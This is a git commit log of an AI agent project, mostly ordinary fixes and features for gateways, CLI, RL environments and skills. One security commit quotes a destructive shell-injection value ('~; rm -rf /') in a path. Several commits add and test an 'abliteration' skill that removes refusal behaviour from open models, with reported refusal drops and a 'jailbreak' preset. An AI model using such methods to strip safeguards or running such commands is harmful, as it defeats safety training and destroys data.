captures Windows drive-letter prefix in rg/grep output parsing. Fixes
search_files returning zero results on Windows where paths like
C:\path\file.py:42:content were misparsed by naive colon splitting.
No behavior change on Unix/Mac.
2026-03-09 23:18:42 -07:00
teknium1
805ce8177b Merge PR #529: fix: restrict .env file permissions to owner-only
Authored by Himess. Adds 0600 chmod on ~/.hermes/.env after writing API keys,
matching the existing pattern in auth.py for auth.json.
2026-03-09 23:10:59 -07:00
teknium1
bdce33e239 Merge PR #810: fix(cli): handle unquoted multi-word session names in -c/--continue and -r/--resume 2026-03-09 23:08:45 -07:00
Teknium
9be8d88ccc Merge pull request #815 from NousResearch/hermes/hermes-5ab2a29e
Add hermes-atropos-environments bundled skill
2026-03-09 23:06:19 -07:00
teknium1
6ab3ebf195 Add hermes-atropos-environments skill (bundled)
Add comprehensive skill for building, testing, and debugging Hermes Agent
RL environments for Atropos training. Includes:

- SKILL.md: Full guide covering HermesAgentBaseEnv interface, required
  methods, config class, CLI modes (serve/process/evaluate), reward
  function patterns, common pitfalls, and minimum implementation checklist
- New 'Inference Setup' section: instructs the agent to always ask the
  user for their inference provider (OpenRouter + model choice, self-hosted
  VLLM endpoint, or other OpenAI-compatible API) before running tests
- references/agentresult-fields.md: AgentResult dataclass field reference
- references/atropos-base-env.md: Atropos BaseEnv API reference
- references/usage-patterns.md: Step-by-step patterns for process,
  evaluate, serve, and smoke test modes

Will be auto-synced to ~/.hermes/skills/ via skills_sync.
2026-03-09 23:04:17 -07:00
teknium1
0a628c1aef fix(cli): handle unquoted multi-word session names in -c/--continue and -r/--resume
When a user runs `hermes -w -c Pokemon Agent Dev` without quoting the
session name, argparse would fail with:
  error: argument command: invalid choice: 'Agent'

This is because argparse parses `-c Pokemon` (consuming one token via
nargs='?'), then sees 'Agent' and tries to match it as a subcommand.

Fix: add _coalesce_session_name_args() that pre-processes sys.argv before
argparse, joining consecutive non-flag, non-subcommand tokens after -c or
-r into a single argument. This makes both quoted and unquoted multi-word
session names work transparently.

Includes 17 tests covering all edge cases: multi-word names, single-word,
bare flags, flag ordering, subcommand boundaries, and passthrough.
2026-03-09 21:36:29 -07:00
teknium1
36328a996f Merge PR #458: Add explicit UTF-8 encoding to config/data file I/O
Authored by shitcoinsherpa. Adds encoding='utf-8' to all text-mode
open() calls in gateway/run.py, gateway/config.py, hermes_cli/config.py,
hermes_cli/main.py, and hermes_cli/status.py. Prevents encoding errors
on Windows where the default locale is not UTF-8.

Also fixed 4 additional open() calls in gateway/run.py that were added
after the PR branch was created.
2026-03-09 21:19:20 -07:00
shitcoinsherpa
4bc32dc0f1 Fix password reader for Windows using msvcrt.getwch()
The existing password prompt uses /dev/tty and termios to read input
with echo disabled. Neither exists on Windows.

On Windows, msvcrt.getwch() reads a single character from the console
without echoing it. This adds a Windows code path that uses getwch()
in a loop, collecting characters until Enter is pressed.

The Unix path using termios and /dev/tty is unchanged.
2026-03-09 21:15:59 -07:00
teknium1
4de5e017f1 Merge PR #457: Use pywinpty for PTY support on Windows
Authored by shitcoinsherpa. Imports winpty.PtyProcess on Windows instead
of ptyprocess.PtyProcess, and adds platform markers to the [pty] extra
so the correct package is installed automatically.
2026-03-09 21:09:56 -07:00
teknium1
3e352f8a0d fix: add upstream guard for non-dict function_args + tests for build_tool_preview
Complements PR #453 by 0xbyt4. Adds isinstance(dict) guard in
run_agent.py to catch cases where json.loads returns non-dict
(e.g. null, list, string) before they reach downstream code.

Also adds 15 tests for build_tool_preview covering None args,
empty dicts, known/unknown tools, fallback keys, truncation,
and all special-cased tools (process, todo, memory, session_search).
2026-03-09 21:01:40 -07:00
teknium1
28ae5db9b0 Merge PR #453: fix: handle None args in build_tool_preview
Authored by 0xbyt4. Adds defensive guard for None/empty args in
build_tool_preview() to prevent crashes when a model returns null
tool call arguments.
2026-03-09 20:58:34 -07:00
teknium1
d5811c887a Merge: fix double judge call + eval buffer pollution in WebResearchEnv 2026-03-09 20:57:54 -07:00
teknium1
975fd86dc4 fix: eliminate double LLM judge call and eval buffer pollution
evaluate() was calling _llm_judge twice per item (once via
compute_reward, once directly) — double the API cost for no benefit.
Now extracts correctness from compute_reward's buffer instead.

Also: compute_reward appends to training metric buffers during eval,
which would pollute wandb training charts. Now rolls back buffer
entries added during eval so training metrics stay clean.
2026-03-09 20:57:46 -07:00
teknium1
0ff7fe3ee2 Merge PR #439: docs: fix spelling of 'publicly'
Authored by JackTheGit. Simple typo fix: publically → publicly in axolotl reference docs.
2026-03-09 20:55:37 -07:00
teknium1
b9d55d5719 feat: add pokemon-player skill with battle-tested gameplay tips
Comprehensive skill for playing Pokemon Red/Blue via the pokemon-agent
package (NousResearch/pokemon-agent). Includes:

- Full startup procedure (uv venv, server, localhost.run dashboard tunnel)
- Save/load lifecycle and naming conventions
- Gameplay loop with emphasis on frequent vision checks
- Hard-learned navigation tips:
  - Use vision every 2-4 steps (RAM state is blind to obstacles)
  - Wait 2-3 seconds after door/stair warps for map transitions
  - Sidestep after exiting buildings to avoid re-entering
  - Hold B to speed Gen 1's slow text scrolling
  - Ledges are one-way — use vision to find gaps
- Battle strategy, type chart, Gen 1 quirks
- Memory conventions with PKM: prefix
- Progression milestones through all 8 gyms + Elite Four
2026-03-09 20:29:38 -07:00
teknium1
ab7dc22984 Merge: WebResearchEnv evaluate() with full agent loop + tools 2026-03-09 19:53:36 -07:00
teknium1
bf8350ac18 fix: evaluate() uses full agent loop with tools, not single-turn
The evaluate method was doing single-turn chat_completion (no tools),
which defeats the purpose of an agentic research benchmark. Fixed to
run the full HermesAgentLoop with web_search/web_extract tools.

Results comparison (Claude Sonnet 4.5, FRAMES benchmark):
  Without tools (broken): 0.56 mean correctness
  With agent loop + tools: 1.00 mean correctness, 0.994 reward

New eval metrics: mean_correctness, mean_reward, mean_tool_calls,
tool_usage_rate — all logged via evaluate_log() in lighteval format.
2026-03-09 19:53:28 -07:00
teknium1
a5c6348d41 Merge: WebResearchEnv compute_reward fix (verified with live test) 2026-03-09 19:29:19 -07:00
teknium1
320f881e0b fix: WebResearchEnv compute_reward extracts from AgentResult.messages
AgentResult has .messages (list of dicts), not .final_response or
.tool_calls. Fixed compute_reward to extract the final response
and tool names from the message history.

Verified with live process mode test:
  - Agent used 7 tool calls (web_search, web_extract)
  - Produced a 1106-char researched response about Winter Olympics
  - Reward: 0.384 (partial correctness via LLM judge)
  - JSONL output contains valid tokens, masks, scores, messages
2026-03-09 19:29:12 -07:00
Brooklyn Nicholson
0d96f1991c test: parallelize test suite with pytest-xdist
~2min sequential runs were painful. Added pytest-xdist and -n auto
to run across all available cores. Tests already isolate state via
tmp_path fixtures so no changes needed to test code.

Local: 2677 passed in ~30s. CI gets 4 vCPUs on ubuntu-latest.
2026-03-09 20:47:34 -05:00
teknium1
172a38c344 fix: Docker persistent bind mounts fail with Permission denied
cap-drop ALL removes DAC_OVERRIDE, which root needs to write to
bind-mounted directories owned by the host user (uid 1000). This
broke persistent Docker sandboxes — the container couldn't write
to /workspace or /root.

Add back the minimum capabilities needed:
- DAC_OVERRIDE: root can write to bind-mounted dirs owned by host user
- CHOWN: package managers (pip, npm, apt) need to set file ownership
- FOWNER: needed for operations on files owned by other users

Still drops all other capabilities (NET_RAW, SYS_ADMIN, etc.) and
keeps no-new-privileges. Security boundary is the container itself.

Verified end-to-end: create files → destroy container → new container
with same task_id → files persist on host and are accessible in the
new container.
2026-03-09 17:52:33 -07:00
teknium1
8bc0d4f77d Merge: WebResearchEnv Atropos standards compliance 2026-03-09 17:45:57 -07:00
teknium1
8eabdefa8a fix: bring WebResearchEnv up to Atropos environment standards
The environment was merged missing several standard components.
Updated to match the patterns established by 82 Atropos environments
and our own HermesAgentBaseEnv contract.

Added:
- WebResearchEnvConfig — custom Pydantic config with reward weights,
  efficiency thresholds, eval settings, dataset config (all tunable
  via CLI/YAML without code changes)
- config_init() classmethod — default server config (OpenRouter +
  Claude) so the env works out of the box
- wandb_log() override — logs reward breakdown metrics (correctness,
  tool_usage, efficiency, diversity, correct_rate, tool_usage_rate)
  with proper buffer management and super() call
- evaluate() — uses server.chat_completion instead of broken stub
  _run_agent_on_item(). Logs via evaluate_log() for lighteval-
  compatible output.

Fixed:
- Removed broken _run_agent_on_item() stub that returned empty results
- evaluate() now uses server.chat_completion (same pattern as
  TerminalTestEnv) for actual model evaluation
- compute_reward reads tool calls from AgentResult properly
- LLM judge uses self.server.chat_completion instead of ctx

Reward config is now tunable without code changes:
  --env.correctness_weight 0.6
  --env.tool_usage_weight 0.2
  --env.efficiency_weight 0.2
  --env.diversity_bonus 0.1
  --env.efficient_max_calls 5
2026-03-09 17:45:50 -07:00
teknium1
f658af45c2 Merge PR #446: fix(cli): use correct visibility filter string in codex API model fetch
Authored by PercyDikec. Fixes #445.
Changes 'hide' to 'hidden' in _fetch_models_from_api to match
_read_cache_models and the actual API response format.
2026-03-09 17:42:39 -07:00
teknium1
5212644861 fix(security): prevent shell injection in tilde-username path expansion
Validate that the username portion of ~username paths contains only
valid characters (alphanumeric, dot, hyphen, underscore) before passing
to shell echo for expansion. Previously, paths like '~; rm -rf /'
would be passed unquoted to self._exec(f'echo {path}'), allowing
arbitrary command execution.

The approach validates the username rather than using shlex.quote(),
which would prevent tilde expansion from working at all since
echo '~user' outputs the literal string instead of expanding it.

Added tests for injection blocking and valid ~username/path expansion.

Credit to @alireza78a for reporting (PR #442, issue #442).
2026-03-09 17:33:19 -07:00
teknium1
1151f84351 Merge PR #434: feat: add WebResearchEnv RL environment for multi-step web research
Authored by jackx707. Adds web_research_env.py (Atropos RL environment for
multi-step web research using FRAMES benchmark) and batch generation config.
2026-03-09 17:24:20 -07:00
teknium1
9abd6bf342 fix: gateway missing docker_volumes config bridge + list serialization bug
The gateway's config.yaml → env var bridge was missing docker_volumes,
so Docker volume mounts configured in config.yaml were ignored for
gateway sessions (Telegram, Discord, etc.) while working in CLI.

Also fixes list serialization: str() produces Python repr with single
quotes which json.loads() in terminal_tool.py can't parse. Now uses
json.dumps() for list values.

Based on PR #431 by @manuelschipper (applied manually due to stale branch).
2026-03-09 17:24:00 -07:00
Teknium
d2c7ef6b41 Merge pull request #792 from NousResearch/hermes/hermes-d2f5523a
Merge PR #428: Improve type hints and error diagnostics in vision_tools + add 42 tests
2026-03-09 17:21:44 -07:00
0xbyt4
4e3a8a0637 fix: handle empty choices in MCP sampling callback
SamplingHandler.__call__ accessed response.choices[0] without checking
if the list was non-empty. LLM APIs can return empty choices on content
filtering, provider errors, or rate limits, causing an unhandled
IndexError that propagates to the MCP SDK and may crash the connection.

Add a defensive guard that returns a proper ErrorData when choices is
empty, None, or missing. Includes three test cases covering all
variants.
2026-03-10 02:24:53 +03:00
teknium1
a34102049b Merge: vision auto-detection fallback to local endpoints 2026-03-09 15:36:27 -07:00
teknium1
ef5d811aba fix: vision auto-detection now falls back to custom/local endpoints
Vision auto-mode previously only tried OpenRouter, Nous, and Codex
for multimodal — deliberately skipping custom endpoints with the
assumption they 'may not handle vision input.' This caused silent
failures for users running local multimodal models (Qwen-VL, LLaVA,
Pixtral, etc.) without any cloud API keys.

Now custom endpoints are tried as a last resort in auto mode. If the
model doesn't support vision, the API call fails gracefully — but
users with local vision models no longer need to manually set
auxiliary.vision.provider: main in config.yaml.

Reported by @Spadav and @kotyKD.
2026-03-09 15:36:19 -07:00
teknium1
2d44ed1c5b test: add comprehensive tests for vision_tools (42 tests)
Covers PR #428 changes and existing vision_tools functionality:
- _validate_image_url: 20 tests for urlparse-based validation
- _determine_mime_type: 6 tests for MIME type detection
- _image_to_base64_data_url: 3 tests for base64 conversion
- _handle_vision_analyze: 5 tests for type hints, prompt building,
  AUXILIARY_VISION_MODEL env var override
- Error logging exc_info: 3 async tests verifying stack traces are
  logged on download failure, analysis error, and cleanup error
- check_vision_requirements & get_debug_session_info: 2 basic tests
- Registry integration: 3 tests for tool registration
2026-03-09 15:32:02 -07:00
teknium1
fa2e72ae9c docs: document docker_volumes config for shared host directories
The Docker backend already supports user-configured volume mounts via
docker_volumes, but it was undocumented — missing from DEFAULT_CONFIG,
cli.py defaults, and configuration docs.

Changes:
- hermes_cli/config.py: Add docker_volumes to DEFAULT_CONFIG with
  inline documentation and examples
- cli.py: Add docker_volumes to load_cli_config defaults
- configuration.md: Full Docker Volume Mounts section with YAML
  examples, use cases (providing files, receiving outputs, shared
  workspaces), and env var alternative
2026-03-09 15:29:34 -07:00
teknium1
5bfc4ed53b Merge PR #428: Improve type hints and error diagnostics in vision_tools
Authored by aydnOktay. Improves URL validation with urlparse, adds exc_info
to error logs for full stack traces, and tightens type hints.

Resolved merge conflict in _handle_vision_analyze: kept PR's string formatting
with our AUXILIARY_VISION_MODEL env var logic.
2026-03-09 15:27:54 -07:00
teknium1
520aec20e0 fix: add mcp to dev dependencies for test suite
MCP tests import from mcp.types but mcp wasn't in the dev optional
dependencies. Fresh 'pip install -e .[dev]' setups failed 3 tests.

Based on PR #427 by @teyrebaz33 (applied manually due to stale branch).
2026-03-09 15:12:54 -07:00
teknium1
64bec1d060 fix: Slack gateway setup missing event subscriptions and scopes
The 'hermes gateway setup' instructions for Slack were missing:
- The 'Subscribe to Events' step entirely (message.im, message.channels,
  app_mention, message.groups)
- Several required scopes (app_mentions:read, groups:history, users:read,
  files:write)
- Warning about bot only working in DMs without message.channels
- Step to invite the bot to channels

The 'hermes setup' flow (setup.py) and the website docs (slack.md)
already had the correct information — only gateway.py was outdated.

Reported by JordanB on Slack.
2026-03-09 14:31:19 -07:00
teknium1
ac58309dbd docs: improve Slack setup guide with channel event subscriptions and scopes
The #1 support issue with Slack is 'bot works in DMs but not channels'.
This is almost always caused by missing event subscriptions (message.channels,
message.groups) or missing OAuth scopes (channels:history, groups:history).

Changes:
- slack.md: Move channels:history and groups:history from optional to required
  scopes. Move message.channels and message.groups to required events. Add new
  'How the Bot Responds' section explaining DM vs channel behavior. Add Step 8
  for inviting bot to channels. Expand troubleshooting table with specific
  'works in DMs not channels' entry. Add quick checklist for channel debugging.
- setup.py: Expand Slack setup wizard with all required scopes, event
  subscriptions, and a warning that without message.channels/message.groups
  the bot only works in DMs. Add link to full docs. Improve Member ID
  discovery instructions.
- config.py: Update SLACK_BOT_TOKEN and SLACK_APP_TOKEN descriptions to list
  required scopes and event subscriptions inline.
2026-03-09 14:00:11 -07:00
teyrebaz33
94023e6a85 feat: conditional skill activation based on tool availability
Skills can now declare fallback_for_toolsets, fallback_for_tools,
requires_toolsets, and requires_tools in their SKILL.md frontmatter.
The system prompt builder filters skills automatically based on which
tools are available in the current session.

- Add _read_skill_conditions() to parse conditional frontmatter fields
- Add _skill_should_show() to evaluate conditions against available tools
- Update build_skills_system_prompt() to accept and apply tool availability
- Pass valid_tool_names and available toolsets from run_agent.py
- Backward compatible: skills without conditions always show; calling
  build_skills_system_prompt() with no args preserves existing behavior

Closes #539
2026-03-09 23:13:39 +03:00
teknium1
5eaf4a3f32 feat: Telegram send_document and send_video for native file attachments
Implement send_document() and send_video() overrides in TelegramAdapter
so the agent can deliver files (PDFs, CSVs, docs, etc.) and videos as
native Telegram attachments instead of just printing the file path as
text.

The base adapter already routes MEDIA:<path> tags by extension — audio
goes to send_voice(), images to send_image_file(), and everything else
falls through to send_document(). But TelegramAdapter didn't override
send_document() or send_video(), so those fell back to plain text.

Now when the agent includes MEDIA:/path/to/report.pdf in its response,
users get a proper downloadable file attachment in Telegram.

Features:
- send_document: sends files via bot.send_document with display name,
  caption (truncated to 1024), and reply_to support
- send_video: sends videos via bot.send_video with inline playback
- Both fall back to base class text if the Telegram API call fails
- 10 new tests covering success, custom filename, file-not-found,
  not-connected, caption truncation, API error fallback, and reply_to

Requested by @TigerHixTang on Twitter.
2026-03-09 13:07:10 -07:00
Teknium
a5a5d82a21 Merge pull request #784 from NousResearch/feat/slack-app-mention-and-documents
feat(slack): fix app_mention 404 + add document/video support
2026-03-09 13:04:50 -07:00
teknium1
34e8d088c2 feat(slack): fix app_mention 404 + add document/video support
- Register no-op app_mention event handler to suppress Bolt 404 errors.
  The 'message' handler already processes @mentions in channels, so
  app_mention is acknowledged without duplicate processing.

- Add send_document() for native file attachments (PDFs, CSVs, etc.)
  via files_upload_v2, matching the pattern from Telegram PR #779.

- Add send_video() for native video uploads via files_upload_v2.

- Handle incoming document attachments from users: download, cache,
  and inject text content for .txt/.md files (capped at 100KB),
  following the same pattern as the Telegram adapter.

- Add _download_slack_file_bytes() helper for raw byte downloads.

- Add 24 new tests covering all new functionality.

Fixes the unhandled app_mention events reported in gateway logs.
2026-03-09 13:02:59 -07:00
memosr.eth
b78b605ba9 fix: replace print() with logger.error() in file_tools 2026-03-09 22:29:16 +03:00
teyrebaz33
c3cf88b202 feat(cli,gateway): add /personality none and custom personality support
Closes #643

Changes:
- /personality none|default|neutral — clears system prompt overlay
- Custom personalities in config.yaml support dict format with:
  name, description, system_prompt, tone, style directives
- Backwards compatible — existing string format still works
- CLI + gateway both updated
- 18 tests covering none/default/neutral, dict format, string format,
  list display, save to config
2026-03-09 17:31:54 +03:00
0xbyt4
58b756f04c fix: clean up empty file after failed wl-paste clipboard extraction
When wl-paste produces empty output, the destination file was left
on disk as a 0-byte orphan. Now explicitly removed before returning
False.
2026-03-09 17:17:10 +03:00
0xbyt4
34f8ac2d85 fix: replace blocking time.sleep with await asyncio.sleep in WhatsApp connect
time.sleep(1) inside async def connect() blocks the entire event
loop for 1 second. Replaced with await asyncio.sleep(1) to yield
control back to the event loop while waiting for the killed port
process to release.
2026-03-09 17:16:26 +03:00
0xbyt4
1a10eb8cd9 fix: off-by-one in setup toggle selection error message
Error message said "between 1 and N+1" for N items, showing a
max value that would itself be rejected. Now correctly says
"between 1 and N".
2026-03-09 17:15:23 +03:00
luisv-1
59705b80cd Add tools summary flag to Hermes CLI
Made-with: Cursor
2026-03-09 16:50:53 +03:00
aydnOktay
46a7d6aeb2 Improve Telegram gateway error handling and logging 2026-03-09 15:58:01 +03:00
teknium1
c754135965 fix: banner wraps in narrow terminals (Kitty, small windows)
The full HERMES-AGENT ASCII logo needs ~95 columns, and the
side-by-side caduceus + tools panel needs ~80. In narrow terminals
(Kitty default, resized windows) everything wraps into visual garbage.

Fixes:
- show_banner() auto-detects terminal width and falls back to compact
  banner when < 80 columns
- build_welcome_banner() skips the ASCII logo when < 95 columns
- Compact banner now dynamically sized via _build_compact_banner()
  instead of a hardcoded 64-char box that also wrapped in narrow terms
- Same width checks applied to /clear command's banner refresh

The up/down arrow key issue in Kitty terminal for multiline input is
a known Kitty keyboard protocol (CSI u) vs prompt_toolkit compatibility
gap — arrow keys work correctly in standard terminals and tmux. Users
can work around it by running in tmux or setting TERM=xterm-256color.
2026-03-09 05:57:36 -07:00
teknium1
c6b75baad0 feat: find-nearby skill and Telegram location support
Adds a 'find-nearby' skill for discovering nearby places using
OpenStreetMap (Overpass + Nominatim). No API keys needed. Works with:
- Coordinates (from Telegram location pins)
- Addresses, cities, zip codes, landmarks (auto-geocoded)
- Multiple place types (restaurant, cafe, bar, pharmacy, etc.)

Returns names, distances, cuisine, hours, addresses, and Google Maps
links (pin + directions). 184-line stdlib-only script.

Also adds Telegram location message handling:
- New MessageType.LOCATION in gateway base
- Telegram adapter handles LOCATION and VENUE messages
- Injects lat/lon coordinates into conversation context
- Prompts agent to ask what the user wants nearby

Inspired by PR #422 (reimplemented with simpler script and broader
skill scope — addresses/cities/zips, not just Telegram coordinates).
2026-03-09 05:31:10 -07:00
teknium1
a7ad6f6d28 Merge: custom providers instant activation + model persistence 2026-03-09 05:08:01 -07:00
teknium1
1a2141d04d fix: custom providers activate immediately, save model name
Selecting a saved custom provider now switches instantly without
probing /models — the model name is stored in the config entry
as a complete profile (name + url + key + model).

Changes:
- custom_providers entries now include 'model' field
- Selecting a saved provider with a model just activates it
- Only probes /models if no model is saved (first-time setup)
- Menu shows saved model name: 'Local (localhost:8000) — llama-70b'
- Dedup on re-entry: still activates the model, just doesn't add
  a duplicate config entry (updates model name if changed)
2026-03-09 05:07:53 -07:00
teknium1
ff3f3169b2 Merge: auto-save custom endpoints + removal option 2026-03-09 04:58:27 -07:00
teknium1
f4580b6010 feat: auto-save custom endpoints + removal option
When a user adds a custom endpoint via 'hermes model' → 'Custom
endpoint', it now automatically saves to custom_providers in
config.yaml so it persists and appears in the provider menu on
subsequent runs. Deduplicates by base_url.

Auto-generated names based on URL:
  http://localhost:8000/v1 → 'Local (localhost:8000)'
  https://xyz.runpod.ai/v1 → 'RunPod (xyz.runpod.ai)'
  https://api.example.com/v1 → 'Api.example.com'

Also adds 'Remove a saved custom provider' option to the menu
(only shown when custom providers exist) with a selection UI
to pick which one to remove.

Users can also manually edit custom_providers in config.yaml
for full control over names and settings.
2026-03-09 04:58:20 -07:00
aydnOktay
d82fcef91b Improve Discord gateway error handling and logging 2026-03-09 14:33:21 +03:00
teknium1
7b63a787b3 Merge: named custom providers in hermes model 2026-03-09 03:45:26 -07:00
teknium1
069570d103 feat: support multiple named custom providers in hermes model
Users with multiple local servers or custom endpoints can now define
them all in config.yaml and switch between them from the model
selection menu:

  custom_providers:
    - name: 'Local Llama 70B'
      base_url: 'http://localhost:8000/v1'
      api_key: 'not-needed'
    - name: 'RunPod vLLM'
      base_url: 'https://xyz.runpod.ai/v1'
      api_key: 'rp_xxxxx'

These appear in `hermes model` provider selection alongside the
built-in providers. When selected, the endpoint's /models API is
probed to show available models in a selection menu.

Previously only a single 'Custom endpoint' option existed, requiring
manual URL entry each time you wanted to switch between local servers.

Requested by @ZiarnoBobu on Twitter.
2026-03-09 03:45:17 -07:00
teknium1
0dafdcab86 Merge: skill reorganization + sub-category support
- Sub-category support in prompt_builder.py (backwards-compatible)
- Split mlops (40 skills) into 7 logical sub-categories
- Merged 8 singleton categories into logical parents
- Fixed 2 misplaced skills (code-review, ml-paper-writing)
2026-03-09 03:40:11 -07:00
Teknium
654e16187e feat(mcp): add sampling support — server-initiated LLM requests (#753)
Add MCP sampling/createMessage capability via SamplingHandler class.

Text-only sampling + tool use in sampling with governance (rate limits,
model whitelist, token caps, tool loop limits). Per-server audit metrics.

Based on concept from PR #366 by eren-karakus0. Restructured as class-based
design with bug fixes and tests using real MCP SDK types.

50 new tests, 2600 total passing.
2026-03-09 03:37:38 -07:00
teknium1
732c66b0f3 refactor: reorganize skills into sub-categories
The skills directory was getting disorganized — mlops alone had 40
skills in a flat list, and 12 categories were singletons with just
one skill each.

Code change:
- prompt_builder.py: Support sub-categories in skill scanner.
  skills/mlops/training/axolotl/SKILL.md now shows as category
  'mlops/training' instead of just 'mlops'. Backwards-compatible
  with existing flat structure.

Split mlops (40 skills) into 7 sub-categories:
- mlops/training (12): accelerate, axolotl, flash-attention,
  grpo-rl-training, peft, pytorch-fsdp, pytorch-lightning,
  simpo, slime, torchtitan, trl-fine-tuning, unsloth
- mlops/inference (8): gguf, guidance, instructor, llama-cpp,
  obliteratus, outlines, tensorrt-llm, vllm
- mlops/models (6): audiocraft, clip, llava, segment-anything,
  stable-diffusion, whisper
- mlops/vector-databases (4): chroma, faiss, pinecone, qdrant
- mlops/evaluation (5): huggingface-tokenizers,
  lm-evaluation-harness, nemo-curator, saelens, weights-and-biases
- mlops/cloud (2): lambda-labs, modal
- mlops/research (1): dspy

Merged singleton categories:
- gifs → media (gif-search joins youtube-content)
- music-creation → media (heartmula, songsee)
- diagramming → creative (excalidraw joins ascii-art)
- ocr-and-documents → productivity
- domain → research (domain-intel)
- feeds → research (blogwatcher)
- market-data → research (polymarket)

Fixed misplaced skills:
- mlops/code-review → software-development (not ML-specific)
- mlops/ml-paper-writing → research (academic writing)

Added DESCRIPTION.md files for all new/updated categories.
2026-03-09 03:35:53 -07:00
teknium1
1f0944de21 fix: handle non-string content from OpenAI-compatible servers (#759)
Some local LLM servers (llama-server, etc.) return message.content as
a dict or list instead of a plain string. This caused AttributeError
'dict object has no attribute strip' on every API call.

Normalizes content to string immediately after receiving the response:
- dict: extracts 'text' or 'content' field, falls back to json.dumps
- list: extracts text parts (OpenAI multimodal content format)
- other: str() conversion

Applied at the single point where response.choices[0].message is read
in the main agent loop, so all downstream .strip()/.startswith()/[:100]
operations work regardless of server implementation.

Closes #759
2026-03-09 03:32:32 -07:00
0xbyt4
912efe11b5 fix(tests): add content attribute to fake result objects
_FakeReadResult and _FakeSearchResult now expose the attributes
that read_file_tool/search_tool access after the redact_sensitive_text
integration from main.
2026-03-09 13:25:52 +03:00
0xbyt4
4684aaffdc merge: resolve file_tools.py conflict with origin/main
Combine read/search loop detection with main's redact_sensitive_text
and truncation hint features. Add tracker reset to TestSearchHints
to prevent cross-test state leakage.
2026-03-09 13:21:46 +03:00
teknium1
f1a1b58319 fix: hermes setup doesn't update provider when switching to OpenRouter
When switching FROM Codex/Nous/custom TO OpenRouter via 'hermes setup',
the old provider stayed active because setup only saved the API key but
never updated config.yaml or auth.json. This caused resolve_provider()
to keep returning the old provider (e.g. openai-codex) even after the
user selected OpenRouter.

Fix: the OpenRouter path in setup now deactivates any OAuth provider
in auth.json and writes model.provider='openrouter' to config.yaml,
matching what all other provider paths already do.
2026-03-09 03:14:22 -07:00
teknium1
c21d77ca08 Merge: OBLITERATUS skill v2.0 + unified gateway compression
OBLITERATUS skill (PR #408 updated):
- 9 CLI methods, 28 analysis modules, 116 model presets
- Default method: advanced (multi-direction SVD, norm-preserving)
- Live-tested: Qwen2.5-3B 75%→0% refusal, Qwen2.5-0.5B 60%→20%
- References, templates, and real-world pitfalls included

Gateway compression fix (PR #739):
- Unified session hygiene with agent compression config
- Uses model context length × compression.threshold from config.yaml
- Removed hardcoded 100k/200-msg thresholds
2026-03-09 02:59:41 -07:00
teknium1
d6c710706f docs: add real-world testing findings to OBLITERATUS skill
Added pitfalls discovered during live abliteration testing:
- Models < 1B have fragmented refusal, respond poorly (0.5B: 60%→20%)
- Models 3B+ work much better (3B: 75%→0% with advanced defaults)
- aggressive method can backfire on small models (made it worse)
- Spectral certification RED is common even when refusal rate is 0%
- Fixed torch property: total_mem → total_memory
2026-03-09 02:52:54 -07:00
teknium1
a6d3becd6a feat: update OBLITERATUS skill to v2.0 — match current repo state
Major updates to reflect the current OBLITERATUS codebase:

- Change default recommendation from 'informed' (experimental) to
  'advanced' (reliable, well-tested multi-direction SVD)
- Add new CLI commands: tourney, recommend, strategies, report,
  aggregate, abliterate (alias)
- Add --direction-method flag (diff_means, svd, leace)
- Add strategies module (embedding/FFN ablation, head pruning,
  layer removal)
- Add evaluation module with LM Eval Harness integration
- Expand analysis modules from 15 to 28
- Add Apple Silicon (MLX) support
- Add study presets (quick, jailbreak, knowledge, etc.)
- Add --contribute, --verify-sample-size, --preset flags
- Add complete CLI command reference table
- Fix torch property name: total_mem -> total_memory (caught
  during live testing)

Tested: Successfully abliterated Qwen2.5-0.5B-Instruct using
'advanced' method — refusal rate 0.4%, coherence 1.0, model
responds without refusal to test prompts.
2026-03-09 02:39:03 -07:00
teknium1
3b67606c42 fix: custom endpoint provider shows as openrouter in gateway
Three issues caused the gateway to display 'openrouter' instead of
'Custom endpoint' when users configured a custom OAI-compatible endpoint:

1. hermes setup: custom endpoint path saved OPENAI_BASE_URL and
   OPENAI_API_KEY to .env but never wrote model.provider to config.yaml.
   All other providers (Codex, z.ai, Kimi, etc.) call
   _update_config_for_provider() which sets this — custom was the only
   path that skipped it. Now writes model.provider='custom' and
   model.base_url to config.yaml.

2. hermes model: custom endpoint set model.provider='auto' in config.yaml.
   The CLI display had a hack to detect OPENAI_BASE_URL and override to
   'custom', but the gateway didn't. Now sets model.provider='custom'
   directly.

3. gateway /model and /provider commands: defaulted to 'openrouter' and
   read config.yaml — which had no provider set. Added OPENAI_BASE_URL
   detection fallback (same pattern the CLI uses) as a defensive catch
   for existing users who set up before this fix.
2026-03-09 02:38:34 -07:00
teknium1
f8240143b6 feat(discord): add DISCORD_ALLOW_BOTS config for bot message filtering (inspired by openclaw)
Add configurable bot message filtering via DISCORD_ALLOW_BOTS env var:

- 'none' (default): Ignore all other bot messages — matches previous
  behavior where only our own bot was filtered, but now ALL bots are
  filtered by default for cleaner channels
- 'mentions': Accept bot messages only when they @mention our bot —
  useful for bot-to-bot workflows triggered by mentions
- 'all': Accept all bot messages — for setups where bots need to
  interact freely

Previously, we only ignored our own bot's messages, allowing all other
bots through. This could cause noisy loops in channels with multiple bots.

8 new tests covering all filter modes and edge cases.

Inspired by openclaw v2026.3.7 Discord allowBots: 'mentions' config.
2026-03-09 02:20:57 -07:00
teknium1
0ce190be0d security: enforce 0600/0700 file permissions on sensitive files (inspired by openclaw)
Enforce owner-only permissions on files and directories that contain
secrets or sensitive data:

- cron/jobs.py: jobs.json (0600), cron dirs (0700), job output files (0600)
- hermes_cli/config.py: config.yaml (0600), .env (0600), ~/.hermes/* dirs (0700)
- cli.py: config.yaml via save_config_value (0600)

All chmod calls use try/except for Windows compatibility.

Includes _secure_file() and _secure_dir() helpers with graceful fallback.
8 new tests verify permissions on all file types.

Inspired by openclaw v2026.3.7 file permission enforcement.
2026-03-09 02:19:32 -07:00
teknium1
a2d0d07109 Merge PR #754: fix: stabilize system prompt across gateway turns for cache hits
Prevents unnecessary Anthropic prompt cache misses by reusing stored
system prompts for continuing sessions and stabilizing Honcho context
per session instead of per turn.
2026-03-09 02:00:14 -07:00
teknium1
aedb773f0d fix: stabilize system prompt across gateway turns for cache hits
Two changes to prevent unnecessary Anthropic prompt cache misses in the
gateway, where a fresh AIAgent is created per user message:

1. Reuse stored system prompt for continuing sessions:
   When conversation_history is non-empty, load the system prompt from
   the session DB instead of rebuilding from disk. The model already has
   updated memory in its conversation history (it wrote it!), so
   re-reading memory from disk produces a different system prompt that
   breaks the cache prefix.

2. Stabilize Honcho context per session:
